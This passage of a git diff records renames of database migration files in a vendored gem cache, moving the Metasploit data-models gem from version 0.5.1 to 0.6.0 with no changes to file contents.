rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb rename to 